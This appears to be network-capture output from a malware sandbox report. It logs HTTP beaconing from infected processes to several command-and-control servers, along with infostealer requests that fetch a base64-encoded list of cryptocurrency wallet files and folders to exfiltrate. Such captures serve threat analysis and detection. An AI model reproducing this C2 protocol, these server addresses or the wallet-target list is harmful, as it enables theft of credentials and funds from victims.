                                                                                                                                                                                                                                                                                        User-Agent: Mozilla/5.0 (Windows NT 10.0; Win64; x64) AppleWebKit/537.36 (KHTML, like Gecko) Chrome/109.0.0.0 Safari/537.3
                                                                                                                                                                                                                                                                                        Content-Length: 4
                                                                                                                                                                                                                                                                                        Dec 12, 2024 16:49:55.009968996 CET6OUTData Raw: 45 5b 58 05
                                                                                                                                                                                                                                                                                        Data Ascii: E[X
                                                                                                                                                                                                                                                                                        Dec 12, 2024 16:49:56.352857113 CET216INHTTP/1.1 200 OK
                                                                                                                                                                                                                                                                                        Date: Thu, 12 Dec 2024 23:49:55 GMT
                                                                                                                                                                                                                                                                                        Server: Apache/2.4.58 (Win64) OpenSSL/3.1.3 PHP/8.2.12
                                                                                                                                                                                                                                                                                        X-Powered-By: PHP/8.2.12
                                                                                                                                                                                                                                                                                        Content-Length: 0
                                                                                                                                                                                                                                                                                        Connection: close
                                                                                                                                                                                                                                                                                        Content-Type: text/html; charset=UTF-8


                                                                                                                                                                                                                                                                                        Session IDSource IPSource PortDestination IPDestination PortPIDProcess
                                                                                                                                                                                                                                                                                        85192.168.2.1050136185.81.68.147803968C:\Windows\explorer.exe
                                                                                                                                                                                                                                                                                        TimestampBytes transferredDirectionData
                                                                                                                                                                                                                                                                                        Dec 12, 2024 16:49:56.578699112 CET283OUTPOST /tizhyf/gate.php?2DB3A69DE7692371543510 HTTP/1.1
                                                                                                                                                                                                                                                                                        Host: 185.81.68.147
                                                                                                                                                                                                                                                                                        Pragma: no-cache
                                                                                                                                                                                                                                                                                        Content-type: text/html
                                                                                                                                                                                                                                                                                        Connection: close
                                                                                                                                                                                                                                                                                        User-Agent: Mozilla/5.0 (Windows NT 10.0; Win64; x64) AppleWebKit/537.36 (KHTML, like Gecko) Chrome/109.0.0.0 Safari/537.3
                                                                                                                                                                                                                                                                                        Content-Length: 4
                                                                                                                                                                                                                                                                                        Dec 12, 2024 16:49:56.698621988 CET6OUTData Raw: 45 5b 58 05
                                                                                                                                                                                                                                                                                        Data Ascii: E[X
                                                                                                                                                                                                                                                                                        Dec 12, 2024 16:49:58.227936029 CET216INHTTP/1.1 200 OK
                                                                                                                                                                                                                                                                                        Date: Thu, 12 Dec 2024 23:49:57 GMT
                                                                                                                                                                                                                                                                                        Server: Apache/2.4.58 (Win64) OpenSSL/3.1.3 PHP/8.2.12
                                                                                                                                                                                                                                                                                        X-Powered-By: PHP/8.2.12
                                                                                                                                                                                                                                                                                        Content-Length: 0
                                                                                                                                                                                                                                                                                        Connection: close
                                                                                                                                                                                                                                                                                        Content-Type: text/html; charset=UTF-8


                                                                                                                                                                                                                                                                                        Session IDSource IPSource PortDestination IPDestination PortPIDProcess
                                                                                                                                                                                                                                                                                        86192.168.2.1050138185.215.113.43807820C:\Users\user\AppData\Local\Temp\abc3bc1985\skotes.exe
                                                                                                                                                                                                                                                                                        TimestampBytes transferredDirectionData
                                                                                                                                                                                                                                                                                        Dec 12, 2024 16:49:57.571371078 CET306OUTPOST /Zu7JuNko/index.php HTTP/1.1
                                                                                                                                                                                                                                                                                        Content-Type: application/x-www-form-urlencoded
                                                                                                                                                                                                                                                                                        Host: 185.215.113.43
                                                                                                                                                                                                                                                                                        Content-Length: 152
                                                                                                                                                                                                                                                                                        Cache-Control: no-cache
                                                                                                                                                                                                                                                                                        Data Raw: 72 3d 42 34 38 33 33 32 35 38 39 37 43 43 45 37 44 45 30 38 34 35 41 45 43 31 34 44 36 36 33 35 30 35 33 44 41 37 30 37 42 35 38 43 38 33 42 34 45 46 41 38 45 44 43 38 32 36 39 33 34 30 31 39 42 31 34 30 42 45 31 44 34 36 34 35 30 46 43 39 44 44 46 36 34 32 45 33 42 44 44 37 30 41 37 37 42 31 32 45 37 37 42 30 35 42 38 32 44 31 32 46 43 30 37 44 42 32 33 39 42 39 36 44 41 30 34 34 35 31 36 36 45 46 37 41 37 44 33 35 42 31 45 37 35 30 38 36 34 32 39 39
                                                                                                                                                                                                                                                                                        Data Ascii: r=B483325897CCE7DE0845AEC14D6635053DA707B58C83B4EFA8EDC826934019B140BE1D46450FC9DDF642E3BDD70A77B12E77B05B82D12FC07DB239B96DA0445166EF7A7D35B1E750864299
                                                                                                                                                                                                                                                                                        Dec 12, 2024 16:49:58.941513062 CET196INHTTP/1.1 200 OK
                                                                                                                                                                                                                                                                                        Server: nginx/1.18.0 (Ubuntu)
                                                                                                                                                                                                                                                                                        Date: Thu, 12 Dec 2024 15:49:58 GMT
                                                                                                                                                                                                                                                                                        Content-Type: text/html; charset=UTF-8
                                                                                                                                                                                                                                                                                        Transfer-Encoding: chunked
                                                                                                                                                                                                                                                                                        Connection: keep-alive
                                                                                                                                                                                                                                                                                        Data Raw: 37 0d 0a 20 3c 63 3e 3c 64 3e 0d 0a 30 0d 0a 0d 0a
                                                                                                                                                                                                                                                                                        Data Ascii: 7 <c><d>0


                                                                                                                                                                                                                                                                                        Session IDSource IPSource PortDestination IPDestination PortPIDProcess
                                                                                                                                                                                                                                                                                        87192.168.2.1050139185.81.68.147803968C:\Windows\explorer.exe
                                                                                                                                                                                                                                                                                        TimestampBytes transferredDirectionData
                                                                                                                                                                                                                                                                                        Dec 12, 2024 16:49:58.459934950 CET283OUTPOST /tizhyf/gate.php?2DB3A69DE7692371543510 HTTP/1.1
                                                                                                                                                                                                                                                                                        Host: 185.81.68.147
                                                                                                                                                                                                                                                                                        Pragma: no-cache
                                                                                                                                                                                                                                                                                        Content-type: text/html
                                                                                                                                                                                                                                                                                        Connection: close
                                                                                                                                                                                                                                                                                        User-Agent: Mozilla/5.0 (Windows NT 10.0; Win64; x64) AppleWebKit/537.36 (KHTML, like Gecko) Chrome/109.0.0.0 Safari/537.3
                                                                                                                                                                                                                                                                                        Content-Length: 4
                                                                                                                                                                                                                                                                                        Dec 12, 2024 16:49:58.579931021 CET6OUTData Raw: 45 5b 58 05
                                                                                                                                                                                                                                                                                        Data Ascii: E[X
                                                                                                                                                                                                                                                                                        Dec 12, 2024 16:49:59.922442913 CET216INHTTP/1.1 200 OK
                                                                                                                                                                                                                                                                                        Date: Thu, 12 Dec 2024 23:49:59 GMT
                                                                                                                                                                                                                                                                                        Server: Apache/2.4.58 (Win64) OpenSSL/3.1.3 PHP/8.2.12
                                                                                                                                                                                                                                                                                        X-Powered-By: PHP/8.2.12
                                                                                                                                                                                                                                                                                        Content-Length: 0
                                                                                                                                                                                                                                                                                        Connection: close
                                                                                                                                                                                                                                                                                        Content-Type: text/html; charset=UTF-8


                                                                                                                                                                                                                                                                                        Session IDSource IPSource PortDestination IPDestination PortPIDProcess
                                                                                                                                                                                                                                                                                        88192.168.2.1050140185.215.113.206807020C:\Users\user\AppData\Local\Temp\1014442001\d8d3046b98.exe
                                                                                                                                                                                                                                                                                        TimestampBytes transferredDirectionData
                                                                                                                                                                                                                                                                                        Dec 12, 2024 16:49:59.769385099 CET203OUTPOST /c4becf79229cb002.php HTTP/1.1
                                                                                                                                                                                                                                                                                        Content-Type: multipart/form-data; boundary=----DAECFIJDAAAKECBFCGHI
                                                                                                                                                                                                                                                                                        Host: 185.215.113.206
                                                                                                                                                                                                                                                                                        Content-Length: 1067
                                                                                                                                                                                                                                                                                        Connection: Keep-Alive
                                                                                                                                                                                                                                                                                        Cache-Control: no-cache
                                                                                                                                                                                                                                                                                        Dec 12, 2024 16:49:59.769413948 CET1067OUTData Raw: 2d 2d 2d 2d 2d 2d 44 41 45 43 46 49 4a 44 41 41 41 4b 45 43 42 46 43 47 48 49 0d 0a 43 6f 6e 74 65 6e 74 2d 44 69 73 70 6f 73 69 74 69 6f 6e 3a 20 66 6f 72 6d 2d 64 61 74 61 3b 20 6e 61 6d 65 3d 22 74 6f 6b 65 6e 22 0d 0a 0d 0a 64 63 64 61 66 31
                                                                                                                                                                                                                                                                                        Data Ascii: ------DAECFIJDAAAKECBFCGHIContent-Disposition: form-data; name="token"dcdaf140d56ab944c6816da6bd37f386d0b9b82f7616044d96ca15365406e4c651aa3d47------DAECFIJDAAAKECBFCGHIContent-Disposition: form-data; name="file_name"aGlzdG9yeVxNb
                                                                                                                                                                                                                                                                                        Dec 12, 2024 16:50:01.595212936 CET203INHTTP/1.1 200 OK
                                                                                                                                                                                                                                                                                        Date: Thu, 12 Dec 2024 15:50:00 GMT
                                                                                                                                                                                                                                                                                        Server: Apache/2.4.41 (Ubuntu)
                                                                                                                                                                                                                                                                                        Content-Length: 0
                                                                                                                                                                                                                                                                                        Keep-Alive: timeout=5, max=100
                                                                                                                                                                                                                                                                                        Connection: Keep-Alive
                                                                                                                                                                                                                                                                                        Content-Type: text/html; charset=UTF-8
                                                                                                                                                                                                                                                                                        Dec 12, 2024 16:50:01.982980013 CET469OUTPOST /c4becf79229cb002.php HTTP/1.1
                                                                                                                                                                                                                                                                                        Content-Type: multipart/form-data; boundary=----JDBGDHIIDAEBFHJJDBFI
                                                                                                                                                                                                                                                                                        Host: 185.215.113.206
                                                                                                                                                                                                                                                                                        Content-Length: 267
                                                                                                                                                                                                                                                                                        Connection: Keep-Alive
                                                                                                                                                                                                                                                                                        Cache-Control: no-cache
                                                                                                                                                                                                                                                                                        Data Raw: 2d 2d 2d 2d 2d 2d 4a 44 42 47 44 48 49 49 44 41 45 42 46 48 4a 4a 44 42 46 49 0d 0a 43 6f 6e 74 65 6e 74 2d 44 69 73 70 6f 73 69 74 69 6f 6e 3a 20 66 6f 72 6d 2d 64 61 74 61 3b 20 6e 61 6d 65 3d 22 74 6f 6b 65 6e 22 0d 0a 0d 0a 64 63 64 61 66 31 34 30 64 35 36 61 62 39 34 34 63 36 38 31 36 64 61 36 62 64 33 37 66 33 38 36 64 30 62 39 62 38 32 66 37 36 31 36 30 34 34 64 39 36 63 61 31 35 33 36 35 34 30 36 65 34 63 36 35 31 61 61 33 64 34 37 0d 0a 2d 2d 2d 2d 2d 2d 4a 44 42 47 44 48 49 49 44 41 45 42 46 48 4a 4a 44 42 46 49 0d 0a 43 6f 6e 74 65 6e 74 2d 44 69 73 70 6f 73 69 74 69 6f 6e 3a 20 66 6f 72 6d 2d 64 61 74 61 3b 20 6e 61 6d 65 3d 22 6d 65 73 73 61 67 65 22 0d 0a 0d 0a 77 61 6c 6c 65 74 73 0d 0a 2d 2d 2d 2d 2d 2d 4a 44 42 47 44 48 49 49 44 41 45 42 46 48 4a 4a 44 42 46 49 2d 2d 0d 0a
                                                                                                                                                                                                                                                                                        Data Ascii: ------JDBGDHIIDAEBFHJJDBFIContent-Disposition: form-data; name="token"dcdaf140d56ab944c6816da6bd37f386d0b9b82f7616044d96ca15365406e4c651aa3d47------JDBGDHIIDAEBFHJJDBFIContent-Disposition: form-data; name="message"wallets------JDBGDHIIDAEBFHJJDBFI--
                                                                                                                                                                                                                                                                                        Dec 12, 2024 16:50:02.427400112 CET1236INHTTP/1.1 200 OK
                                                                                                                                                                                                                                                                                        Date: Thu, 12 Dec 2024 15:50:02 GMT
                                                                                                                                                                                                                                                                                        Server: Apache/2.4.41 (Ubuntu)
                                                                                                                                                                                                                                                                                        Vary: Accept-Encoding
                                                                                                                                                                                                                                                                                        Content-Length: 2408
                                                                                                                                                                                                                                                                                        Keep-Alive: timeout=5, max=99
                                                                                                                                                                                                                                                                                        Connection: Keep-Alive
                                                                                                                                                                                                                                                                                        Content-Type: text/html; charset=UTF-8
                                                                                                                                                                                                                                                                                        Data Raw: 51 6d 6c 30 59 32 39 70 62 69 42 44 62 33 4a 6c 66 44 46 38 58 45 4a 70 64 47 4e 76 61 57 35 63 64 32 46 73 62 47 56 30 63 31 78 38 64 32 46 73 62 47 56 30 4c 6d 52 68 64 48 77 78 66 45 4a 70 64 47 4e 76 61 57 34 67 51 32 39 79 5a 53 42 50 62 47 52 38 4d 58 78 63 51 6d 6c 30 59 32 39 70 62 6c 78 38 4b 6e 64 68 62 47 78 6c 64 43 6f 75 5a 47 46 30 66 44 42 38 52 47 39 6e 5a 57 4e 76 61 57 35 38 4d 58 78 63 52 47 39 6e 5a 57 4e 76 61 57 35 63 66 43 70 33 59 57 78 73 5a 58 51 71 4c 6d 52 68 64 48 77 77 66 46 4a 68 64 6d 56 75 49 45 4e 76 63 6d 56 38 4d 58 78 63 55 6d 46 32 5a 57 35 63 66 43 70 33 59 57 78 73 5a 58 51 71 4c 6d 52 68 64 48 77 77 66 45 52 68 5a 57 52 68 62 48 56 7a 49 45 31 68 61 57 35 75 5a 58 52 38 4d 58 78 63 52 47 46 6c 5a 47 46 73 64 58 4d 67 54 57 46 70 62 6d 35 6c 64 46 78 33 59 57 78 73 5a 58 52 7a 58 48 78 7a 61 47 55 71 4c 6e 4e 78 62 47 6c 30 5a 58 77 77 66 45 4a 73 62 32 4e 72 63 33 52 79 5a 57 46 74 49 45 64 79 5a 57 56 75 66 44 46 38 58 45 4a 73 62 32 4e 72 63 33 52 79 5a 57 [TRUNCATED]
                                                                                                                                                                                                                                                                                        Data Ascii: Qml0Y29pbiBDb3JlfDF8XEJpdGNvaW5cd2FsbGV0c1x8d2FsbGV0LmRhdHwxfEJpdGNvaW4gQ29yZSBPbGR8MXxcQml0Y29pblx8KndhbGxldCouZGF0fDB8RG9nZWNvaW58MXxcRG9nZWNvaW5cfCp3YWxsZXQqLmRhdHwwfFJhdmVuIENvcmV8MXxcUmF2ZW5cfCp3YWxsZXQqLmRhdHwwfERhZWRhbHVzIE1haW5uZXR8MXxcRGFlZGFsdXMgTWFpbm5ldFx3YWxsZXRzXHxzaGUqLnNxbGl0ZXwwfEJsb2Nrc3RyZWFtIEdyZWVufDF8XEJsb2Nrc3RyZWFtXEdyZWVuXHdhbGxldHNcfCouKnwxfFdhc2FiaSBXYWxsZXR8MXxcV2FsbGV0V2FzYWJpXENsaWVudFxXYWxsZXRzXHwqLmpzb258MHxFdGhlcmV1bXwxfFxFdGhlcmV1bVx8a2V5c3RvcmV8MHxFbGVjdHJ1bXwxfFxFbGVjdHJ1bVx3YWxsZXRzXHwqLip8MHxFbGVjdHJ1bUxUQ3wxfFxFbGVjdHJ1bS1MVENcd2FsbGV0c1x8Ki4qfDB8RXhvZHVzfDF8XEV4b2R1c1x8ZXhvZHVzLmNvbmYuanNvbnwwfEV4b2R1c3wxfFxFeG9kdXNcfHdpbmRvdy1zdGF0ZS5qc29ufDB8RXhvZHVzXGV4b2R1cy53YWxsZXR8MXxcRXhvZHVzXGV4b2R1cy53YWxsZXRcfHBhc3NwaHJhc2UuanNvbnwwfEV4b2R1c1xleG9kdXMud2FsbGV0fDF8XEV4b2R1c1xleG9kdXMud2FsbGV0XHxzZWVkLnNlY298MHxFeG9kdXNcZXhvZHVzLndhbGxldHwxfFxFeG9kdXNcZXhvZHVzLndhbGxldFx8aW5mby5zZWNvfDB8RWxlY3Ryb24gQ2FzaHwxfFxFbGVjdHJvbkNhc2hcd2FsbGV0c1x8Ki4qfDB8TXVsdGlEb2dlfDF8
                                                                                                                                                                                                                                                                                        Dec 12, 2024 16:50:02.427407026 CET1236INData Raw: 58 45 31 31 62 48 52 70 52 47 39 6e 5a 56 78 38 62 58 56 73 64 47 6c 6b 62 32 64 6c 4c 6e 64 68 62 47 78 6c 64 48 77 77 66 45 70 68 65 48 67 67 52 47 56 7a 61 33 52 76 63 43 41 6f 62 32 78 6b 4b 58 77 78 66 46 78 71 59 58 68 34 58 45 78 76 59 32
                                                                                                                                                                                                                                                                                        Data Ascii: XE11bHRpRG9nZVx8bXVsdGlkb2dlLndhbGxldHwwfEpheHggRGVza3RvcCAob2xkKXwxfFxqYXh4XExvY2FsIFN0b3JhZ2VcfGZpbGVfXzAubG9jYWxzdG9yYWdlfDB8SmF4eCBEZXNrdG9wfDF8XGNvbS5saWJlcnR5LmpheHhcSW5kZXhlZERCXGZpbGVfXzAuaW5kZXhlZGRiLmxldmVsZGJcfCouKnwwfEF0b21pY3wxfFx
                                                                                                                                                                                                                                                                                        Dec 12, 2024 16:50:02.427412033 CET164INData Raw: 5a 45 52 43 58 47 68 30 64 48 42 7a 58 32 64 31 59 58 4a 6b 59 53 35 6a 62 31 38 77 4c 6d 6c 75 5a 47 56 34 5a 57 52 6b 59 69 35 73 5a 58 5a 6c 62 47 52 69 58 48 77 71 4c 69 70 38 4d 48 78 48 64 57 46 79 5a 47 45 67 52 47 56 7a 61 33 52 76 63 46
                                                                                                                                                                                                                                                                                        Data Ascii: ZERCXGh0dHBzX2d1YXJkYS5jb18wLmluZGV4ZWRkYi5sZXZlbGRiXHwqLip8MHxHdWFyZGEgRGVza3RvcFxMb2NhbCBTdG9yYWdlXGxldmVsZGJ8MXxcR3VhcmRhXExvY2FsIFN0b3JhZ2VcbGV2ZWxkYlx8Ki4qfDB8
                                                                                                                                                                                                                                                                                        Dec 12, 2024 16:50:02.554147959 CET467OUTPOST /c4becf79229cb002.php HTTP/1.1
                                                                                                                                                                                                                                                                                        Content-Type: multipart/form-data; boundary=----DHIJEHJDHJKECBFHDHDH
                                                                                                                                                                                                                                                                                        Host: 185.215.113.206
                                                                                                                                                                                                                                                                                        Content-Length: 265
                                                                                                                                                                                                                                                                                        Connection: Keep-Alive
                                                                                                                                                                                                                                                                                        Cache-Control: no-cache
                                                                                                                                                                                                                                                                                        Data Raw: 2d 2d 2d 2d 2d 2d 44 48 49 4a 45 48 4a 44 48 4a 4b 45 43 42 46 48 44 48 44 48 0d 0a 43 6f 6e 74 65 6e 74 2d 44 69 73 70 6f 73 69 74 69 6f 6e 3a 20 66 6f 72 6d 2d 64 61 74 61 3b 20 6e 61 6d 65 3d 22 74 6f 6b 65 6e 22 0d 0a 0d 0a 64 63 64 61 66 31 34 30 64 35 36 61 62 39 34 34 63 36 38 31 36 64 61 36 62 64 33 37 66 33 38 36 64 30 62 39 62 38 32 66 37 36 31 36 30 34 34 64 39 36 63 61 31 35 33 36 35 34 30 36 65 34 63 36 35 31 61 61 33 64 34 37 0d 0a 2d 2d 2d 2d 2d 2d 44 48 49 4a 45 48 4a 44 48 4a 4b 45 43 42 46 48 44 48 44 48 0d 0a 43 6f 6e 74 65 6e 74 2d 44 69 73 70 6f 73 69 74 69 6f 6e 3a 20 66 6f 72 6d 2d 64 61 74 61 3b 20 6e 61 6d 65 3d 22 6d 65 73 73 61 67 65 22 0d 0a 0d 0a 66 69 6c 65 73 0d 0a 2d 2d 2d 2d 2d 2d 44 48 49 4a 45 48 4a 44 48 4a 4b 45 43 42 46 48 44 48 44 48 2d 2d 0d 0a
                                                                                                                                                                                                                                                                                        Data Ascii: ------DHIJEHJDHJKECBFHDHDHContent-Disposition: form-data; name="token"dcdaf140d56ab944c6816da6bd37f386d0b9b82f7616044d96ca15365406e4c651aa3d47------DHIJEHJDHJKECBFHDHDHContent-Disposition: form-data; name="message"files------DHIJEHJDHJKECBFHDHDH--
                                                                                                                                                                                                                                                                                        Dec 12, 2024 16:50:02.992713928 CET202INHTTP/1.1 200 OK
                                                                                                                                                                                                                                                                                        Date: Thu, 12 Dec 2024 15:50:02 GMT
                                                                                                                                                                                                                                                                                        Server: Apache/2.4.41 (Ubuntu)
                                                                                                                                                                                                                                                                                        Content-Length: 0
                                                                                                                                                                                                                                                                                        Keep-Alive: timeout=5, max=98
                                                                                                                                                                                                                                                                                        Connection: Keep-Alive
                                                                                                                                                                                                                                                                                        Content-Type: text/html; charset=UTF-8


                                                                                                                                                                                                                                                                                        Session IDSource IPSource PortDestination IPDestination PortPIDProcess
                                                                                                                                                                                                                                                                                        89192.168.2.1050141185.81.68.147803968C:\Windows\explorer.exe
                                                                                                                                                                                                                                                                                        TimestampBytes transferredDirectionData
                                                                                                                                                                                                                                                                                        Dec 12, 2024 16:50:00.159343958 CET283OUTPOST /tizhyf/gate.php?2DB3A69DE7692371543510 HTTP/1.1
                                                                                                                                                                                                                                                                                        Host: 185.81.68.147
                                                                                                                                                                                                                                                                                        Pragma: no-cache
                                                                                                                                                                                                                                                                                        Content-type: text/html
                                                                                                                                                                                                                                                                                        Connection: close
                                                                                                                                                                                                                                                                                        User-Agent: Mozilla/5.0 (Windows NT 10.0; Win64; x64) AppleWebKit/537.36 (KHTML, like Gecko) Chrome/109.0.0.0 Safari/537.3
                                                                                                                                                                                                                                                                                        Content-Length: 4
                                                                                                                                                                                                                                                                                        Dec 12, 2024 16:50:00.279336929 CET6OUTData Raw: 45 5b 58 05
                                                                                                                                                                                                                                                                                        Data Ascii: E[X
                                                                                                                                                                                                                                                                                        Dec 12, 2024 16:50:01.961062908 CET216INHTTP/1.1 200 OK
                                                                                                                                                                                                                                                                                        Date: Thu, 12 Dec 2024 23:50:00 GMT
                                                                                                                                                                                                                                                                                        Server: Apache/2.4.58 (Win64) OpenSSL/3.1.3 PHP/8.2.12
                                                                                                                                                                                                                                                                                        X-Powered-By: PHP/8.2.12
                                                                                                                                                                                                                                                                                        Content-Length: 0
                                                                                                                                                                                                                                                                                        Connection: close
                                                                                                                                                                                                                                                                                        Content-Type: text/html; charset=UTF-8


                                                                                                                                                                                                                                                                                        Session IDSource IPSource PortDestination IPDestination PortPIDProcess
                                                                                                                                                                                                                                                                                        90192.168.2.1050144185.215.113.43807820C:\Users\user\AppData\Local\Temp\abc3bc1985\skotes.exe
                                                                                                                                                                                                                                                                                        TimestampBytes transferredDirectionData
                                                                                                                                                                                                                                                                                        Dec 12, 2024 16:50:01.008996964 CET156OUTPOST /Zu7JuNko/index.php HTTP/1.1
                                                                                                                                                                                                                                                                                        Content-Type: application/x-www-form-urlencoded
                                                                                                                                                                                                                                                                                        Host: 185.215.113.43
                                                                                                                                                                                                                                                                                        Content-Length: 4
                                                                                                                                                                                                                                                                                        Cache-Control: no-cache
                                                                                                                                                                                                                                                                                        Data Raw: 73 74 3d 73
                                                                                                                                                                                                                                                                                        Data Ascii: st=s
                                                                                                                                                                                                                                                                                        Dec 12, 2024 16:50:02.349546909 CET219INHTTP/1.1 200 OK
                                                                                                                                                                                                                                                                                        Server: nginx/1.18.0 (Ubuntu)
                                                                                                                                                                                                                                                                                        Date: Thu, 12 Dec 2024 15:50:02 GMT
                                                                                                                                                                                                                                                                                        Content-Type: text/html; charset=UTF-8
                                                                                                                                                                                                                                                                                        Transfer-Encoding: chunked
                                                                                                                                                                                                                                                                                        Connection: keep-alive
                                                                                                                                                                                                                                                                                        Refresh: 0; url = Login.php
                                                                                                                                                                                                                                                                                        Data Raw: 31 0d 0a 20 0d 0a 30 0d 0a 0d 0a
                                                                                                                                                                                                                                                                                        Data Ascii: 1 0


                                                                                                                                                                                                                                                                                        Session IDSource IPSource PortDestination IPDestination PortPIDProcess
                                                                                                                                                                                                                                                                                        91192.168.2.1050146185.81.68.147803968C:\Windows\explorer.exe
                                                                                                                                                                                                                                                                                        TimestampBytes transferredDirectionData
                                                                                                                                                                                                                                                                                        Dec 12, 2024 16:50:02.187304974 CET283OUTPOST /tizhyf/gate.php?2DB3A69DE7692371543510 HTTP/1.1
                                                                                                                                                                                                                                                                                        Host: 185.81.68.147
                                                                                                                                                                                                                                                                                        Pragma: no-cache
                                                                                                                                                                                                                                                                                        Content-type: text/html
                                                                                                                                                                                                                                                                                        Connection: close
                                                                                                                                                                                                                                                                                        User-Agent: Mozilla/5.0 (Windows NT 10.0; Win64; x64) AppleWebKit/537.36 (KHTML, like Gecko) Chrome/109.0.0.0 Safari/537.3
                                                                                                                                                                                                                                                                                        Content-Length: 4
                                                                                                                                                                                                                                                                                        Dec 12, 2024 16:50:02.307286024 CET6OUTData Raw: 45 5b 58 05
                                                                                                                                                                                                                                                                                        Data Ascii: E[X
                                                                                                                                                                                                                                                                                        Dec 12, 2024 16:50:03.666012049 CET216INHTTP/1.1 200 OK
                                                                                                                                                                                                                                                                                        Date: Thu, 12 Dec 2024 23:50:02 GMT
                                                                                                                                                                                                                                                                                        Server: Apache/2.4.58 (Win64) OpenSSL/3.1.3 PHP/8.2.12
                                                                                                                                                                                                                                                                                        X-Powered-By: PHP/8.2.12
                                                                                                                                                                                                                                                                                        Content-Length: 0
                                                                                                                                                                                                                                                                                        Connection: close
                                                                                                                                                                                                                                                                                        Content-Type: text/html; charset=UTF-8


                                                                                                                                                                                                                                                                                        Session IDSource IPSource PortDestination IPDestination Port
                                                                                                                                                                                                                                                                                        92192.168.2.1050147185.81.68.14780
                                                                                                                                                                                                                                                                                        TimestampBytes transferredDirectionData
                                                                                                                                                                                                                                                                                        Dec 12, 2024 16:50:02.864022970 CET264OUTPOST /tizhyf/gate.php?2DB3A69DE7692371543510 HTTP/1.1
                                                                                                                                                                                                                                                                                        Host: 185.81.68.147
                                                                                                                                                                                                                                                                                        Pragma: no-cache
                                                                                                                                                                                                                                                                                        Content-type: text/html
                                                                                                                                                                                                                                                                                        Connection: close
                                                                                                                                                                                                                                                                                        User-Agent: Mozilla/5.0 (Windows NT 10.0; Win64; x64) AppleWebKit/537.36 (KHTML, like Gecko) Chrome/109.0.0.0 Safari/537.3
                                                                                                                                                                                                                                                                                        Dec 12, 2024 16:50:04.214760065 CET257INHTTP/1.1 200 OK
                                                                                                                                                                                                                                                                                        Date: Thu, 12 Dec 2024 23:50:03 GMT
                                                                                                                                                                                                                                                                                        Server: Apache/2.4.58 (Win64) OpenSSL/3.1.3 PHP/8.2.12
                                                                                                                                                                                                                                                                                        X-Powered-By: PHP/8.2.12
                                                                                                                                                                                                                                                                                        Content-Length: 40
                                                                                                                                                                                                                                                                                        Connection: close
                                                                                                                                                                                                                                                                                        Content-Type: text/html; charset=UTF-8
                                                                                                                                                                                                                                                                                        Data Raw: 35 32 36 62 39 30 39 36 37 61 31 62 37 35 39 39 36 34 30 35 34 64 32 30 62 37 36 65 36 66 34 66 35 37 34 31 63 31 64 62
                                                                                                                                                                                                                                                                                        Data Ascii: 526b90967a1b759964054d20b76e6f4f5741c1db


                                                                                                                                                                                                                                                                                        Session IDSource IPSource PortDestination IPDestination PortPIDProcess
                                                                                                                                                                                                                                                                                        93192.168.2.1050148185.81.68.147803968C:\Windows\explorer.exe
                                                                                                                                                                                                                                                                                        TimestampBytes transferredDirectionData
                                                                                                                                                                                                                                                                                        Dec 12, 2024 16:50:03.892924070 CET283OUTPOST /tizhyf/gate.php?2DB3A69DE7692371543510 HTTP/1.1
                                                                                                                                                                                                                                                                                        Host: 185.81.68.147
                                                                                                                                                                                                                                                                                        Pragma: no-cache
                                                                                                                                                                                                                                                                                        Content-type: text/html
                                                                                                                                                                                                                                                                                        Connection: close
                                                                                                                                                                                                                                                                                        User-Agent: Mozilla/5.0 (Windows NT 10.0; Win64; x64) AppleWebKit/537.36 (KHTML, like Gecko) Chrome/109.0.0.0 Safari/537.3
                                                                                                                                                                                                                                                                                        Content-Length: 4
                                                                                                                                                                                                                                                                                        Dec 12, 2024 16:50:04.012826920 CET6OUTData Raw: 45 5b 58 05
                                                                                                                                                                                                                                                                                        Data Ascii: E[X
                                                                                                                                                                                                                                                                                        Dec 12, 2024 16:50:05.653717995 CET216INHTTP/1.1 200 OK
                                                                                                                                                                                                                                                                                        Date: Thu, 12 Dec 2024 23:50:04 GMT
                                                                                                                                                                                                                                                                                        Server: Apache/2.4.58 (Win64) OpenSSL/3.1.3 PHP/8.2.12
                                                                                                                                                                                                                                                                                        X-Powered-By: PHP/8.2.12
                                                                                                                                                                                                                                                                                        Content-Length: 0
                                                                                                                                                                                                                                                                                        Connection: close
                                                                                                                                                                                                                                                                                        Content-Type: text/html; charset=UTF-8


                                                                                                                                                                                                                                                                                        Session IDSource IPSource PortDestination IPDestination Port
                                                                                                                                                                                                                                                                                        94192.168.2.1050150185.81.68.14780
                                                                                                                                                                                                                                                                                        TimestampBytes transferredDirectionData
                                                                                                                                                                                                                                                                                        Dec 12, 2024 16:50:04.340871096 CET284OUTPOST /tizhyf/gate.php?2DB3A69DE7692371543510 HTTP/1.1
                                                                                                                                                                                                                                                                                        Host: 185.81.68.147
                                                                                                                                                                                                                                                                                        Pragma: no-cache
                                                                                                                                                                                                                                                                                        Content-type: text/html
                                                                                                                                                                                                                                                                                        Connection: close
                                                                                                                                                                                                                                                                                        User-Agent: Mozilla/5.0 (Windows NT 10.0; Win64; x64) AppleWebKit/537.36 (KHTML, like Gecko) Chrome/109.0.0.0 Safari/537.3
                                                                                                                                                                                                                                                                                        Content-Length: 10
                                                                                                                                                                                                                                                                                        Dec 12, 2024 16:50:04.464068890 CET10OUTData Raw: 72 57 42 2b 57 5a 5c 55 43 12
                                                                                                                                                                                                                                                                                        Data Ascii: rWB+WZ\UC
                                                                                                                                                                                                                                                                                        Dec 12, 2024 16:50:05.962764978 CET1236INHTTP/1.1 200 OK
                                                                                                                                                                                                                                                                                        Date: Thu, 12 Dec 2024 23:50:04 GMT
                                                                                                                                                                                                                                                                                        Server: Apache/2.4.58 (Win64) OpenSSL/3.1.3 PHP/8.2.12
                                                                                                                                                                                                                                                                                        X-Powered-By: PHP/8.2.12
                                                                                                                                                                                                                                                                                        Connection: close
                                                                                                                                                                                                                                                                                        Transfer-Encoding: chunked
                                                                                                                                                                                                                                                                                        Content-Type: text/html; charset=UTF-8
